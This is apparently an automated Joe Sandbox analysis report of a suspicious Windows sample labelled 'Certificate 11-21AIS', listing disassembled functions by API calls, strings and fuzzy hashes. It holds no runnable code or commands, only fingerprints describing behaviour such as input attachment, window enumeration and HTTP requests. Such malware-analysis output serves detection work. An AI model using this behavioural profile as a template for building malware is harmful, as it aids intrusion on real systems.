                                                                              • Opcode Fuzzy Hash: 0616bd048e4eed00f6f89effbf4e869e3e012f711d9754184ef8b07df8742ae8
                                                                              • Instruction Fuzzy Hash: A861AEB5A0424AAFDB20CFA4DC88EAE7BBCFB41304F140459FA41A7291D730AD45DB21
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00929C98
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00929C9B
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00929CBF
                                                                              • _memset.LIBCMT ref: 00929CD0
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00929CE2
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00929D5A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 830647256-0
                                                                              • Opcode ID: 204df7aab776d932f9938b79e415a182dc1082b2064b832f53d6152a4d291861
                                                                              • Instruction ID: d8e3f46fed62c9147ed062c4113a32e760d8c07cc8248983bd32b5e6f16b2f77
                                                                              • Opcode Fuzzy Hash: 204df7aab776d932f9938b79e415a182dc1082b2064b832f53d6152a4d291861
                                                                              • Instruction Fuzzy Hash: 8F617A75A00218AFDB10DFA8DC81EEEB7B8EB09704F14415AFA44E7291D774AD42DB50
                                                                              APIs
                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 008F94FE
                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 008F9549
                                                                              • VariantInit.OLEAUT32(?), ref: 008F955B
                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 008F957B
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 008F95BE
                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 008F95D2
                                                                              • VariantClear.OLEAUT32(?), ref: 008F95E7
                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 008F95F4
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008F95FD
                                                                              • VariantClear.OLEAUT32(?), ref: 008F960F
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008F961A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                              • String ID:
                                                                              • API String ID: 2706829360-0
                                                                              • Opcode ID: 1880f7b00a84a80074007608dc4bbbadb525f7de2552093a252c7b2f59236e4d
                                                                              • Instruction ID: 5b6e2c9ec431980406b8ef96a5b882a9a65df5ecb12e539ddce5b288020adb66
                                                                              • Opcode Fuzzy Hash: 1880f7b00a84a80074007608dc4bbbadb525f7de2552093a252c7b2f59236e4d
                                                                              • Instruction Fuzzy Hash: 2B41303991421DAFCB01DFA4D848EEEBB79FF08354F008065E551E7261DB34EA45DBA1
                                                                              APIs
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • CoInitialize.OLE32 ref: 0091ADF6
                                                                              • CoUninitialize.OLE32 ref: 0091AE01
                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0094D8FC,?), ref: 0091AE61
                                                                              • IIDFromString.OLE32(?,?), ref: 0091AED4
                                                                              • VariantInit.OLEAUT32(?), ref: 0091AF6E
                                                                              • VariantClear.OLEAUT32(?), ref: 0091AFCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                              • API String ID: 834269672-1287834457
                                                                              • Opcode ID: 3aa8f157e1def1fb230c1e2cc58c053cb586bd8371ba5576f3ea238b6f442329
                                                                              • Instruction ID: 3d952e6f95d5462e92f5fed37fa29e26a75f965423ec1820b37ebcf97a51620c
                                                                              • Opcode Fuzzy Hash: 3aa8f157e1def1fb230c1e2cc58c053cb586bd8371ba5576f3ea238b6f442329
                                                                              • Instruction Fuzzy Hash: 77618A71309315AFD710DF64C888FAABBE8AF89714F004809F9859B292C774ED85CB93
                                                                              APIs
                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00918168
                                                                              • inet_addr.WSOCK32(?,?,?), ref: 009181AD
                                                                              • gethostbyname.WSOCK32(?), ref: 009181B9
                                                                              • IcmpCreateFile.IPHLPAPI ref: 009181C7
                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00918237
                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0091824D
                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009182C2
                                                                              • WSACleanup.WSOCK32 ref: 009182C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                              • String ID: Ping
                                                                              • API String ID: 1028309954-2246546115
                                                                              • Opcode ID: 88636aa68cfdf3398fd3a4b8482b55e6e380927df8ec8716282f83cab726994b
                                                                              • Instruction ID: 3bf262df8a78137534397369e877f42d45128ec6ab76e7c950da1fc5cf8b00fd
                                                                              • Opcode Fuzzy Hash: 88636aa68cfdf3398fd3a4b8482b55e6e380927df8ec8716282f83cab726994b
                                                                              • Instruction Fuzzy Hash: 90518E35604604AFD721AF64CC45F6BBBE8FF49350F048929FA65DB2A1DB34E841EB42
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00929E5B
                                                                              • CreateMenu.USER32 ref: 00929E76
                                                                              • SetMenu.USER32(?,00000000), ref: 00929E85
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00929F12
                                                                              • IsMenu.USER32(?), ref: 00929F28
                                                                              • CreatePopupMenu.USER32 ref: 00929F32
                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00929F63
                                                                              • DrawMenuBar.USER32 ref: 00929F71
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                              • String ID: 0
                                                                              • API String ID: 176399719-4108050209
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0090E396
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0090E40C
                                                                              • GetLastError.KERNEL32 ref: 0090E416
                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0090E483
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008FB98C
                                                                              • GetDlgCtrlID.USER32 ref: 008FB997
                                                                              • GetParent.USER32 ref: 008FB9B3
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 008FB9B6
                                                                              • GetDlgCtrlID.USER32(?), ref: 008FB9BF
                                                                              • GetParent.USER32(?), ref: 008FB9DB
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 008FB9DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1383977212-1403004172
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008FBA73
                                                                              • GetDlgCtrlID.USER32 ref: 008FBA7E
                                                                              • GetParent.USER32 ref: 008FBA9A
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 008FBA9D
                                                                              • GetDlgCtrlID.USER32(?), ref: 008FBAA6
                                                                              • GetParent.USER32(?), ref: 008FBAC2
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 008FBAC5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1383977212-1403004172
                                                                              APIs
                                                                              • GetParent.USER32 ref: 008FBAE3
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 008FBAF8
                                                                              • _wcscmp.LIBCMT ref: 008FBB0A
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008FBB85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 1704125052-3381328864
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0091B2D5
                                                                              • CoInitialize.OLE32(00000000), ref: 0091B302
                                                                              • CoUninitialize.OLE32 ref: 0091B30C
                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0091B40C
                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 0091B539
                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0091B56D
                                                                              • CoGetObject.OLE32(?,00000000,0094D91C,?), ref: 0091B590
                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0091B5A3
                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0091B623
                                                                              • VariantClear.OLEAUT32(0094D91C), ref: 0091B633
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                              • String ID:
                                                                              • API String ID: 2395222682-0
                                                                              APIs
                                                                              • __swprintf.LIBCMT ref: 009067FD
                                                                              • __swprintf.LIBCMT ref: 0090680A
                                                                                • Part of subcall function 008E172B: __woutput_l.LIBCMT ref: 008E1784
                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00906834
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00906840
                                                                              • LockResource.KERNEL32(00000000), ref: 0090684D
                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0090686D
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 0090687F
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0090688E
                                                                              • LockResource.KERNEL32(?), ref: 0090689A
                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009068F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                              • String ID:
                                                                              • API String ID: 1433390588-0
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00904047
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009030A5,?,00000001), ref: 0090405B
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00904062
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 00904071
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00904083
                                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 0090409C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 009040AE
                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 009040F3
                                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 00904108
                                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 00904113
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 008DB496
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 008DB4A0
                                                                              • SetBkMode.GDI32(?,00000001), ref: 008DB4B5
                                                                              • GetStockObject.GDI32(00000005), ref: 008DB4BD
                                                                              • GetClientRect.USER32(?), ref: 0093DD63
                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0093DD7A
                                                                              • GetWindowDC.USER32(?), ref: 0093DD86
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0093DD95
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0093DDA7
                                                                              • GetSysColor.USER32(00000005), ref: 0093DDC5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 3430376129-0
                                                                              • Opcode ID: 6939b0ef3193e64f8043285a23ffb2c2ce762ba34ba2644af60a4be1a538e25e
                                                                              • Instruction ID: ce79dc2688f161aa170fc92d90a4de3ae8e873e5453672342aefae471d1385f0
                                                                              • Opcode Fuzzy Hash: 6939b0ef3193e64f8043285a23ffb2c2ce762ba34ba2644af60a4be1a538e25e
                                                                              • Instruction Fuzzy Hash: 22118E39119205EFDB216FA4EC08FA93B66FB0A325F118621FA66951E2CB314941EF21
APIs
• EnumChildWindows.USER32(?,008FCF50), ref: 008FCE90
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: d05c7d1e3016aebe55c593016f023dd6c17781604ada7a11e546d7d64f98d6d2
• Instruction ID: b3b67ea90a6cc9b3c5fdb10044e1f6b5f752baa6c96d14ddfdad8e63c9f63d9c
• Opcode Fuzzy Hash: d05c7d1e3016aebe55c593016f023dd6c17781604ada7a11e546d7d64f98d6d2
• Instruction Fuzzy Hash: 06918131A0060E9ACB18EF74C581BFAFBB5FF05304F50852AD659E7251DF30AA59CBA1
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008C30DC
• CoUninitialize.OLE32(?,00000000), ref: 008C3181
• UnregisterHotKey.USER32(?), ref: 008C32A9
• DestroyWindow.USER32(?), ref: 00935079
• FreeLibrary.KERNEL32(?), ref: 009350F8
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00935125
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 42ab5543f751696211f61cb49b89b61ff52169bc5333f0d89abafd002540aedb
• Instruction ID: ce447778f5e8f56453ab55c4b365f539c050236e111a4da829d808efbd10218d
• Opcode Fuzzy Hash: 42ab5543f751696211f61cb49b89b61ff52169bc5333f0d89abafd002540aedb
• Instruction Fuzzy Hash: 8891F0342006028FC719EB28C895F68F3B8FF19304F5582ADE40AA7262DB31EE56CF45
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 008DCC15
  • Part of subcall function 008DCCCD: GetClientRect.USER32(?,?), ref: 008DCCF6
  • Part of subcall function 008DCCCD: GetWindowRect.USER32(?,?), ref: 008DCD37
  • Part of subcall function 008DCCCD: ScreenToClient.USER32(?,?), ref: 008DCD5F
• GetDC.USER32 ref: 0093D137
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0093D14A
• SelectObject.GDI32(00000000,00000000), ref: 0093D158
• SelectObject.GDI32(00000000,00000000), ref: 0093D16D
• ReleaseDC.USER32(?,00000000), ref: 0093D175
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0093D200
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 77deed3660cadf11354174f317c37400382b9c61791f8dcd5ef7004cbe7bd246
• Instruction ID: 5840a63f943b4fda5b3dd474b680a4f565d7bb0908b2c46dc4bc72007e7404d3
• Opcode Fuzzy Hash: 77deed3660cadf11354174f317c37400382b9c61791f8dcd5ef7004cbe7bd246
• Instruction Fuzzy Hash: 96712034405209DFCF25DFA4E890AAA3BB9FF48324F14422AFD559A2A6C7308C41DF50
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009145FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0091462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0091466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00914682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0091468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009146BF
• InternetCloseHandle.WININET(00000000), ref: 00914706
  • Part of subcall function 00915052: GetLastError.KERNEL32(?,?,009143CC,00000000,00000000,00000001), ref: 00915067
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
